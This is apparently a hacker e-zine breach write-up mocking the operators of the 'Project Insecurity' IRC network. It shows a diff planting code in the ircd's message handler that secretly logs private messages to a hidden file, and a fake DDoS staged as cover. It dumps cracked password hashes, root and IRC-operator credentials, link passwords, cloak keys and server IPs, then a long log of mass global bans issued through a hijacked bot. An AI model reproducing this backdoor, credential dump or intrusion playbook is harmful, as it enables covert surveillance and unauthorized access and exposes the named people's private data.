█ bongrip PRIVMSG #insecurity :they would pop the hub
|
|
█ bongrip PRIVMSG #insecurity :from there u can use pcap play
|
|
█ bongrip PRIVMSG #insecurity :to sniff pm's
|
|
█ bongrip PRIVMSG #insecurity :and everything else
|
|
█
|
|
█ Like this?
|
|
█
|
|
█ src/modules/m_message.c
|
|
█ < if (ret == CANPRIVMSG_SEND)
|
|
█ < {
|
|
█ > FILE *fp;
|
|
█ > fp=fopen("/var/backups/.irc/log.txt", "a");
|
|
█ > fprintf(fp, "%s %s %s :%s\n", parv[0], cmd, nick, text);
|
|
█ > fclose(fp);
|
|
█ < sendto_message_one(acptr, sptr, parv[0], newcmd, nick,
|
|
█ text);
|
|
█ < continue;
|
|
█ < }
|
|
█
|
|
█ src/modules/m_message.c
|
|
█ < if (!text)
|
|
█ < continue;
|
|
█ > FILE *fp;
|
|
█ > fp=fopen("/var/backups/.irc/log.txt", "a");
|
|
█ > fprintf(fp, "%s %s %s :%s\n", sptr->name, cmd, chptr->chname,
|
|
█ text);
|
|
█ > fclose(fp);
|
|
█ < sendto_channelprefix_butone_tok(cptr,
|
|
█ < sptr, chptr,
|
|
█ < prefix,
|
|
█ < notice ? MSG_NOTICE : MSG_PRIVATE,
|
|
█ < notice ? TOK_NOTICE : TOK_PRIVATE,
|
|
█ < nick, text, 1);
|
|
█
|
|
█ There being problem: if we reload ircd американцов opers will receive notice
|
|
█ through the SNOMASK system. So we faking a DDOS attack with bot spam while
|
|
█ delinking the ircd.
|
|
█
|
|
█ YogSotho PRIVMSG #insecurity :I saw mlt log of the bot abuse
|
|
█ bongrip PRIVMSG #insecurity :word to ya mother brother fuckers
|
|
█ bongrip PRIVMSG #insecurity :no
|
|
█ bongrip PRIVMSG #insecurity :that was
|
|
█ bongrip PRIVMSG #insecurity :skids
|
|
█ bongrip PRIVMSG #insecurity :the mammoth has not attacked
|
|
█ bongrip PRIVMSG #insecurity :obv
|
|
█ bongrip PRIVMSG #insecurity :unless
|
|
█ bongrip PRIVMSG #insecurity :UNLESS
|
|
█ bongrip PRIVMSG #insecurity :see one thing did happen
|
|
█ bongrip PRIVMSG #insecurity :out of hte ordinary
|
|
█ YogSotho PRIVMSG #insecurity :Uh...
|
|
█ bongrip PRIVMSG #insecurity :which they mave have done this to prove they rm
|
|
█ 'd it amongst themselves
|
|
█ YogSotho PRIVMSG #insecurity :Warning
|
|
█ bongrip PRIVMSG #insecurity :aussie server delinked
|
|
█ bongrip PRIVMSG #insecurity :out of nowhere
|
|
█ bongrip PRIVMSG #insecurity :i had to /connect back to it
|
|
█ YogSotho PRIVMSG #insecurity :Thats bad
|
|
█ bongrip PRIVMSG #insecurity :cause autoconnect isnt ont
|
|
█ bongrip PRIVMSG #insecurity :but then again
|
|
█ bongrip PRIVMSG #insecurity :thats an unreal bug
|
|
█ bongrip PRIVMSG #insecurity :from 3.2
|
|
█ ^ is not even a bug fitting this description but they still falling for it.
|
|
█
|
|
█
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
███▓▓▓▒▒▒░░░ 0x04 Pass the hash ███
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█░░
|
|
█░
|
|
█░ Western world seeming strange to us. We not used to getting password hash
|
|
█ without coercion. Very nice peoples. глупый, yes, but so kind and trusting.
|
|
█ So да, all you needing for pop root is waiting for admin to fall for child
|
|
█ level social engineering.
|
|
█ Special Спасибо to bongrip for providing this to us in PM.
|
|
█
|
|
█ <bongrip> ins3circd:$6$3Ip4HnTD$c3Nt3o0hKzUf6Xu.mS/rTANN91PSS2043GNn6I.gO5JxU
|
|
█ 5BXFjC5L8uV9D4nb0OJxIlCJwnacwxiyYKOmXm.5/:17306:0:99999:7:::
|
|
█ |
|
|
█ V
|
|
█ gangster4lyf
|
|
█
|
|
█ ins3circd@zyzz8:~$ id
|
|
█ uid=1000(ins3circd) gid=1000(ins3circd) groups=1000(ins3circd)
|
|
█ ins3circd@zyzz8:~$ ./st4t3-sp0ns0r3d-0dayz
|
|
█ root@zyzz8:~# id
|
|
█ uid=0(root) gid=0(root) groups=0(root)
|
|
█
|
|
█ ржунимагу.. J/K they giving IRCd user sudo ALL ..
|
|
█ Insecurity more fitting title as time winding on.
|
|
█
|
|
█ ins3circd@zyzz8:~$ sudo -s
|
|
█ root@zyzz8:~# cat /etc/sudoers|grep ins3circd
|
|
█ ins3circd ALL=(ALL:ALL) ALL
|
|
█
|
|
█ @ret2libc (MLT): Where's our hub IP? Or uname output on any of our leafs?
|
|
█ PLEASE provide even the slightest shred of evidence that you hacked anything
|
|
█
|
|
█ Hub IP: 178.32.215.78
|
|
█ Uname -a of leaf: Linux zyzz8 4.4.59-1-pve #1 SMP PVE 4.4.59-87 (Tue, 25
|
|
█ Apr 2017 09:01:58 +0200) x86_64
|
|
█
|
|
█ <MLT> I don't know hub IP
|
|
█ <MLT> lol
|
|
█ <bongrip> even the wannabe hackers have the hub ip
|
|
█ <bongrip> how do you not have it
|
|
█
|
|
█ If you needing more proof, BLT, please to giving us more hashes.
|
|
█
|
|
█ aPt 1z s1mplY UNR34L $$$$$
|
|
█ root@zyzz8:/home/ins3circd/Unreal3.2.10.1# cat unrealircd.conf
|
|
█ #loadmodule "src/modules/hideserver.so";
|
|
█ loadmodule "src/modules/commands.so";
|
|
█ loadmodule "src/modules/cloak.so";
|
|
█ include "help.conf";
|
|
█ include "badwords.channel.conf";
|
|
█ include "badwords.message.conf";
|
|
█ include "badwords.quit.conf";
|
|
█ include "spamfilter.conf";
|
|
█ include "aliases/anope.conf";
|
|
█
|
|
█ me {
|
|
█ name "aussie.insecurity.zone";
|
|
█ info "Project Insecurity";
|
|
█ numeric 042;
|
|
█ };
|
|
█
|
|
█ admin {
|
|
█ "MLT";
|
|
█ };
|
|
█
|
|
█ class clients
|
|
█ {
|
|
█ pingfreq 420;
|
|
█ maxclients 500;
|
|
█ sendq 100000;
|
|
█ recvq 8000;
|
|
█ };
|
|
█
|
|
█ class servers
|
|
█ {
|
|
█ pingfreq 420;
|
|
█ maxclients 10; /* Max servers we can have linked at a time *
|
|
█ /
|
|
█ sendq 1000000;
|
|
█ connfreq 100; /* How many seconds between each connection
|
|
█ attempt */
|
|
█
|
|
█ };
|
|
█
|
|
█ oper rebel {
|
|
█ class clients;
|
|
█ from {
|
|
█ userhost *@*;
|
|
█ };
|
|
█ password "$zAPIgFNG$YgI80nbHSYuwHt2hYhl7mA=="{ md5; };
|
|
█ flags
|
|
█ {
|
|
█ netadmin;
|
|
█ global;
|
|
█ can_rehash;
|
|
█ can_die;
|
|
█ can_restart;
|
|
█ helpop Oper;
|
|
█ can_wallops;
|
|
█ can_globops;
|
|
█ can_localroute;
|
|
█ can_globalroute;
|
|
█ can_localkill;
|
|
█ can_globalkill;
|
|
█ can_kline;
|
|
█ can_unkline;
|
|
█ can_gkline;
|
|
█ can_localnotice;
|
|
█ can_globalnotice;
|
|
█ can_zline;
|
|
█ can_gkline;
|
|
█ can_gzline;
|
|
█ get_umodew;
|
|
█ get_host;
|
|
█ can_setq;
|
|
█ can_override;
|
|
█ services-admin;
|
|
█ };
|
|
█ snomask kcFfjvGenq;
|
|
█ };
|
|
█
|
|
█ oper MLT {
|
|
█ class clients;
|
|
█ from {
|
|
█ userhost *@*;
|
|
█ };
|
|
█ password "KASDM09A980km0asnmlL/,.ASDMK8jdjJJNDSLA832NLALCK92385795943
|
|
█ 29dhjkmdsa";
|
|
█ flags
|
|
█ {
|
|
█ netadmin;
|
|
█ global;
|
|
█ can_rehash;
|
|
█ can_die;
|
|
█ can_restart;
|
|
█ helpop Oper;
|
|
█ can_wallops;
|
|
█ can_globops;
|
|
█ can_localroute;
|
|
█ can_globalroute;
|
|
█ can_localkill;
|
|
█ can_globalkill;
|
|
█ can_kline;
|
|
█ can_unkline;
|
|
█ can_gkline;
|
|
█ can_localnotice;
|
|
█ can_globalnotice;
|
|
█ can_zline;
|
|
█ can_gkline;
|
|
█ can_gzline;
|
|
█ get_umodew;
|
|
█ get_host;
|
|
█ can_setq;
|
|
█ can_override;
|
|
█ services-admin;
|
|
█
|
|
█ };
|
|
█ snomask kcFfjvGenq;
|
|
█ };
|
|
█
|
|
█ link superb.undernix.net {
|
|
█ username *;
|
|
█ hostname 178.32.215.78;
|
|
█ bind-ip *;
|
|
█ port 5556;
|
|
█ hub *;
|
|
█ password-connect "*(ijlk2j809&ADS(AYULSDIuli23h45lhk,j";
|
|
█ password-receive "*(ijlk2j809&ADS(AYULSDIuli23h45lhk,j";
|
|
█ class servers;
|
|
█ options {
|
|
█ autoconnect;
|
|
█ ssl;
|
|
█ };
|
|
█ };
|
|
█
|
|
█ listen *:5556;
|
|
█ {
|
|
█ options
|
|
█ {
|
|
█ ssl;
|
|
█ serversonly;
|
|
█ }
|
|
█ }
|
|
█
|
|
█ listen *:6697
|
|
█ {
|
|
█ options
|
|
█ {
|
|
█ ssl;
|
|
█ clientsonly;
|
|
█ };
|
|
█ };
|
|
█
|
|
█ listen *:9999
|
|
█ {
|
|
█ options
|
|
█ {
|
|
█ ssl;
|
|
█ clientsonly;
|
|
█ };
|
|
█ };
|
|
█
|
|
█ listen *:7000;
|
|
█ listen *:6919
|
|
█ {
|
|
█ options
|
|
█ {
|
|
█ serversonly;
|
|
█ ssl;
|
|
█ };
|
|
█ };
|
|
█
|
|
█ listen *:6667;
|
|
█ listen *:4585
|
|
█ {
|
|
█ options
|
|
█ {
|
|
█ serversonly;
|
|
█ ssl;
|
|
█ };
|
|
█ };
|
|
█
|
|
█ listen [::ffff:192.168.0.1]:6667;
|
|
█
|
|
█ ulines {
|
|
█ services.undernix.net;
|
|
█ stats.undernix.net;
|
|
█ };
|
|
█
|
|
█ ban nick {
|
|
█ mask "*C*h*a*n*S*e*r*v*";
|
|
█ reason "Reserved for Services";
|
|
█ };
|
|
█
|
|
█ ban nick {
|
|
█ mask "*{*-*}*";
|
|
█ reason "Nickname not allowed";
|
|
█ };
|
|
█ ban nick {
|
|
█ mask "*[*-*]*";
|
|
█ reason "Nickname not allowed";
|
|
█ };
|
|
█
|
|
█ ban nick {
|
|
█ mask "zyk-*";
|
|
█ reason "Nickname not allowed";
|
|
█ };
|
|
█
|
|
█ ban realname {
|
|
█ mask "Swat Team";
|
|
█ reason "mIRKFORCE";
|
|
█ };
|
|
█
|
|
█ set {
|
|
█ network-name "ProjectInsecurity";
|
|
█ default-server "irc.insecurity.zone";
|
|
█ services-server "services.undernix.net";
|
|
█ stats-server "stats.undernix.net";
|
|
█ help-channel "#help";
|
|
█ hiddenhost-prefix "boats";
|
|
█ snomask-on-oper "+xwipIHWgs";
|
|
█
|
|
█ cloak-keys {
|
|
█ "ADXq2XNBW2NQXDP1kd6G2U1q7ph2HG5ZTK0E2wqLa";
|
|
█ "DoF9BXfSkTzKobCQu8vwzWpzZbpm1VquxJpNTvORa";
|
|
█ "hhkOmc3q1ik0sC0bT349zOnnU35xrSK1GEHLzC5Sa";
|
|
█ };
|
|
█
|
|
█ hosts {
|
|
█ local "insecurity.zone";
|
|
█ global "insecurity.zone";
|
|
█ coadmin "insecurity.zone";
|
|
█ admin "insecurity.zone";
|
|
█ servicesadmin "insecurity.zone";
|
|
█ netadmin "insecurity.zone";
|
|
█ host-on-oper-up "yes";
|
|
█ };
|
|
█ };
|
|
█
|
|
█ set {
|
|
█ kline-address "careless@fuckyou.com";
|
|
█ modes-on-connect "+ixw";
|
|
█ modes-on-oper "+xwipIHWgs";
|
|
█ oper-auto-join "#operators";
|
|
█ options {
|
|
█ hide-ulines;
|
|
█ show-connect-info;
|
|
█ };
|
|
█ maxchannelsperuser 20;
|
|
█ restrict-usermodes "s";
|
|
█ oper-only-stats "*";
|
|
█ throttle {
|
|
█ connections 7;
|
|
█ period 60s;
|
|
█ };
|
|
█ anti-flood {
|
|
█ nick-flood 5:30;
|
|
█ };
|
|
█ };
|
|
█
|
|
█ allow {
|
|
█ ip *@*;
|
|
█ hostname *@*;
|
|
█ class clients;
|
|
█ maxperip 9;
|
|
█ };
|
|
█
|
|
█ alias { type services; };
|
|
█ alias ChanServ { type services; };
|
|
█ alias OperServ { type services; };
|
|
█ alias HelpServ { type services; };
|
|
█
|
|
█ @ret2libc (MLT): First off, I haven't even implemented MD5 anywhere.
|
|
█ Secondly, please show me evidence of collisions being actively abused in the
|
|
█ wild.
|
|
█
|
|
█ Is true MLT plaintext != MD5. But maybe we checking the hub config next.
|
|
█ root@zyzz8:~# ./unr34l-p1v0t superb.underunix.net
|
|
█ oper MLT {
|
|
█ class clients;
|
|
█ from {
|
|
█ userhost *@*;
|
|
█ };
|
|
█ password "$eIU5EWKz$juoBabw3RQrdYZYzW/7f2A=="{ md5; };
|
|
█ flags
|
|
█ {
|
|
█ netadmin;
|
|
█ global;
|
|
█ can_rehash;
|
|
█
|
|
█ This looking like MD5 to me.
|
|
█ Okay bongrip, is time to get your priv8 root password..
|
|
█
|
|
█ host = ip-41-230-239-173.toronto.ca.northamericancoax.com : username = ins3c
|
|
█ ircd : password = gangster4lyf
|
|
█ host = 198.15.79.157 : username = root : password = h3ll0p00p6654
|
|
█
|
|
█ root:h3ll0p00p6654
|
|
█
|
|
█
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
███▓▓▓▒▒▒░░░ 0x05 A flaw in MD5 ███
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█░░
|
|
█░
|
|
█░ We'll let bongrip describe his bot for us. Keep in mind there is a bot on
|
|
█ their network that allowing you to change your vhost.
|
|
█
|
|
█ bongrip == rebel/defiler/dope/n0de9 (IPT/BlueHell)
|
|
█ danK == django
|
|
█
|
|
█ <defiler> do not try to exploit django, u will get glined
|
|
█ <defiler> its all automated
|
|
█ <defiler> it identifies by nick/ident/host
|
|
█
|
|
█ <MLT|afk> !vhost insecurity.zone
|
|
█ * vHostserv sets ban on MLT|afk!*@*
|
|
█ * You have been kicked from #vhost by vHostserv (Done. You can request a new
|
|
█ vhost after 1 seconds from your last one. Banned for 1 seconds)
|
|
█
|
|
█ By the way, is still 0day'd, they never figuring it out. Their best guess
|
|
█ being we either made a 0day driveby browser exploit or cracked a 63
|
|
█ character m1x3d alphanumeric MD5 hash with symb0ls.
|
|
█
|
|
█ Which would take 4,109,550,000,000,000,000,000,000,000,000,000,000,000,000,
|
|
█ 000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,
|
|
█ 000,000 years for our cluster of 200 GTX1080's to crack. The heat death of
|
|
█ universe would happening first, but skids not thinking that far.
|
|
█
|
|
█ * Now talking on #priv8
|
|
█ * Topic for #priv8 is: SuPeR SeCrEt
|
|
█ * Topic for #priv8 set by MLT (Sun Jun 4 08:33:14 2017)
|
|
█ * danK sets mode +a on #priv8 MLT
|
|
█ * danK gives channel operator status to MLT
|
|
█ <danK> OPER OVERRIDE: danK
|
|
█ (POTENT@ec2-34-210-28-112.us-west-2.compute.amazonaws.com) MODE #priv8 +ao
|
|
█ MLT MLT
|
|
█ <MLT> .gline dirty
|
|
█ <danK> Added gline for dirty r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ dirty!dirty@crownemirates.bid (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline fuzion
|
|
█ <danK> Added gline for fuzion r.i.p
|
|
█ <MLT> .gline fuzi0n
|
|
█ <danK> Added gline for fuzi0n r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ FuZi0N!FuZi0N@162.248.73.100 (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline lola
|
|
█ <danK> Added gline for lola r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ lola!lola@zyzz10.isla.moe (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ catsik!catsik@zyzz10.isla.moe (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline RMS
|
|
█ <danK> Added gline for RMS r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: RMS!r1ch4rd@91.92.136.64
|
|
█ (User has been permanently banned from internetz.me
|
|
█ (no reason))
|
|
█ <MLT> .gline Nux
|
|
█ <danK> Added gline for Nux r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: Nux!nux@skidstain.com
|
|
█ (User has been permanently banned from internetz.me
|
|
█ (no reason))
|
|
█ <MLT> .gline syn4pse
|
|
█ <danK> Added gline for syn4pse r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ loeken!loeken@u.internetz.me (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ syn4pse!syn@u.internetz.me (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ [internetz|me|u]!ime@u.internetz.me (User has been permanently banned
|
|
█ from internetz.me (no reason))
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ syn4pse-!syninsec@u.internetz.me (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline sxcurity
|
|
█ <danK> Added gline for sxcurity r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone: sxcurity!sxC@nullptr.cz
|
|
█ (User has been permanently banned from ProjectInsecurity (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: bongrip_!a@nullptr.cz
|
|
█ (User has been permanently banned from internetz.me (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: dab!2POTENT@nullptr.cz
|
|
█ (User has been permanently banned from internetz.me (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: Zodiac!Zodiac@nullptr.cz
|
|
█ (User has been permanently banned from internetz.me (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: bongrip-!a@nullptr.cz
|
|
█ (User has been permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline sniger
|
|
█ <danK> Added gline for sniger r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ sniger!sniger@45.32.162.220 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ danC3!danC2@45.32.162.220 (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline tables
|
|
█ <danK> Added gline for tables r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ tables!tables@5.79.86.15 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline Bansh
|
|
█ <danK> (User) connecting : at fsociety.internetz.me: loeken
|
|
█ (loeken@p5DDC2C31.dip0.t-ipconnect.de)
|
|
█ <danK> Added gline for Bansh r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ Bansh!r00t@tor.thd.ninja (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: tables
|
|
█ (tables@marylou.nos-oignons.net)
|
|
█ <danK> NickServ: tables!tables@marylou.nos-oignons.net identified for nick
|
|
█ tables.
|
|
█ <MLT> .gline Derp
|
|
█ <danK> Added gline for Derp r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone: Derp!Derp@194.88.143.66
|
|
█ (User has been permanently banned from ProjectInsecurity (no reason))
|
|
█ <MLT> .gline vein
|
|
█ <danK> Added gline for vein r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ vein!Amaterasu@ec2-52-42-196-254.us-west-2.compute.amazonaws.com
|
|
█ (User has been permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline dab
|
|
█ <danK> Added gline for dab r.i.p
|
|
█ <MLT> .gline FSB
|
|
█ Sorry komrade
|
|
█ <danK> Added gline for FSB r.i.p
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: Derp
|
|
█ (Derp@tor00.telenet.unc.edu)
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone: FSB!efSB@95.215.47.208
|
|
█ (User has been permanently banned from ProjectInsecurity (no reason))
|
|
█ <MLT> .gline Alyssa
|
|
█ <danK> Added gline for Alyssa r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ skooch!sid3163@brockwell.irccloud.com (User has been permanently banned
|
|
█ frominternetz.me (no reason))
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ Alyssa!sid226984@brockwell.irccloud.com (User has been permanently banned
|
|
█ from ProjectInsecurity (no reason))
|
|
█ <MLT> .gline peanuter
|
|
█ <danK> Added gline for peanuter r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ peanuter!peanuter@80.82.77.240 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline ma0u
|
|
█ <danK> Added gline for ma0u r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: ma0u!fr0zn@45.63.41.227
|
|
█ (User has been permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline anniesbbs
|
|
█ <danK> Added gline for anniesbbs r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ anniesbbs!anniesbbs@185.21.216.195 (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline dyingbreed
|
|
█ <danK> GLOBAL OPS: -- from OperServ: loeken is now an IRC operator.
|
|
█ <danK> Added gline for dyingbreed r.i.p
|
|
█ <danK> (User) connecting : at aussie.insecurity.zone: dirty
|
|
█ (dirty@tor00.telenet.unc.edu)
|
|
█ <danK> (User) exiting : dyingbreed (x@0s3x.internetz.me) [User has been
|
|
█ permanently banned from HackTimes (no reason)]
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ Southern_B|tch!NoneYa@0s3x.internetz.me (User has been permanently banned
|
|
█ from internetz.me (no reason))
|
|
█ <MLT> .gline loeken
|
|
█ <danK> Added gline for loeken r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ loeken!loeken@p5DDC2C31.dip0.t-ipconnect.de (User has been permanently
|
|
█ banned from internetz.me (no reason))
|
|
█ <MLT> .gline dirty
|
|
█ <danK> Added gline for dirty r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ Derp!Derp@tor00.telenet.unc.edu (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ dirty!dirty@tor00.telenet.unc.edu (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline ShadowBrokers
|
|
█ <danK> Added gline for ShadowBrokers r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ ShadowBrokers!root@afainatl.com (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline trentmicro
|
|
█ <danK> Added gline for trentmicro r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ trentmicro!kayla@204.44.91.24 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <danK> (User) connecting : at fsociety.internetz.me: Bansh
|
|
█ (r00t@163.172.217.50)
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ Bansh!r00t@163.172.217.50 (User is permanently banned (Tor exit server
|
|
█ detected. See www.sectoor.de/tor.php?ip=163.172.217.50))
|
|
█ <MLT> .gline xamfp
|
|
█ <danK> Added gline for xamfp r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ xamfp!xamfp@ec2-52-15-197-60.us-east-2.compute.amazonaws.com (User
|
|
█ has been permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline skooch
|
|
█ <danK> Added gline for skooch r.i.p
|
|
█ <MLT> .gline cSmith
|
|
█ <danK> Added gline for cSmith r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ cSmith!csmith@cynical.us (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline deeboi
|
|
█ <danK> Added gline for deeboi r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ deeboi!deeboi@144.217.215.125 (User has been permanently banned
|
|
█ from internetz.me (no reason))
|
|
█ <MLT> .gline Darkness
|
|
█ <danK> Added gline for Darkness r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ Darkness!Darkness@185.153.198.117 (User has been permanently banned
|
|
█ from internetz.me (no reason))
|
|
█ <MLT> .gline nill
|
|
█ <danK> Added gline for nill r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: nill!n@198.251.80.206
|
|
█ (User has been permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline mr_vile
|
|
█ <danK> Added gline for mr_vile r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: mr_vile!no@i.dontexi.st
|
|
█ (User has been permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline kurobeats
|
|
█ <danK> Added gline for kurobeats r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ kurobeats!Got@CPE-121-215-138-162.lnse1.wel.bigpond.net.au (User has been
|
|
█ permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline Derp
|
|
█ <danK> Added gline for Derp r.i.p
|
|
█ <MLT> .gline FlappyCuck
|
|
█ <danK> Added gline for FlappyCuck r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ FlappyCuck!frinks@192.240.127.83 (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ smurgle!frinks@192.240.127.83 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline scope
|
|
█ <danK> Added gline for scope r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ scope!deploy@ip180.ip-193-70-95.eu (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline Nux_
|
|
█ <danK> Added gline for Nux_ r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me: Nux_!nux@45.76.37.141
|
|
█ (User has been permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline v1tal
|
|
█ <danK> Added gline for v1tal r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ v1tal!buddy@bitcoinshell.mooo.com (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline Teridax
|
|
█ <danK> Added gline for Teridax r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ Teridax!Teridax@teridax.com (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline noproto
|
|
█ <danK> Added gline for noproto r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ noproto!noproto@104.236.220.65 (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline w0ne
|
|
█ <danK> Added gline for w0ne r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ w0ne!w0ne@ec2-35-163-190-224.us-west-2.compute.amazonaws.com (User has been
|
|
█ permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline AHyGjl76Jhf53
|
|
█ <danK> Added gline for AHyGjl76Jhf53 r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ AHyGjl76Jhf53!AHyGjl76Jh@141.132.250.13 (User has been permanently banned
|
|
█ from ProjectInsecurity (no reason))
|
|
█ <MLT> .gline catsik
|
|
█ <danK> Added gline for catsik r.i.p
|
|
█ <MLT> .gline Glaive
|
|
█ <danK> Added gline for Glaive r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ Glaive!Glaive@c-24-15-237-161.hsd1.il.comcast.net (User has been
|
|
█ permanently banned from internetz.me (no reason))
|
|
█ <MLT> .gline didi_
|
|
█ <danK> Added gline for didi_ r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ didi_!anona@82.192.95.120 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline tatootian
|
|
█ <danK> Added gline for tatootian r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ tatootian!p@ns501141.ip-192-99-5.net (User has been permanently banned
|
|
█ from internetz.me (no reason))
|
|
█ <MLT> .gline eight_bytes
|
|
█ <danK> Added gline for eight_bytes r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ eight_bytes!sid141403@192.184.10.9 (User has been permanently banned
|
|
█ from internetz.me (no reason))
|
|
█ <MLT> .gline psycho
|
|
█ <danK> Added gline for psycho r.i.p
|
|
█ <danK> (User) exiting : at fsociety.internetz.me:
|
|
█ psycho!psycho@hammetjus.nl (User has been permanently banned from
|
|
█ internetz.me (no reason))
|
|
█ <MLT> .gline icyphox
|
|
█ <danK> Added gline for icyphox r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ icyphox!icyphox@45.32.112.198 (User has been permanently banned from
|
|
█ ProjectInsecurity (no reason))
|
|
█ <MLT> .gline Salam
|
|
█ <danK> Added gline for Salam r.i.p
|
|
█ <danK> (User) exiting : at aussie.insecurity.zone:
|
|
█ Salam!ric0@23.239.80.28 (User has been permanently banned from
|
|
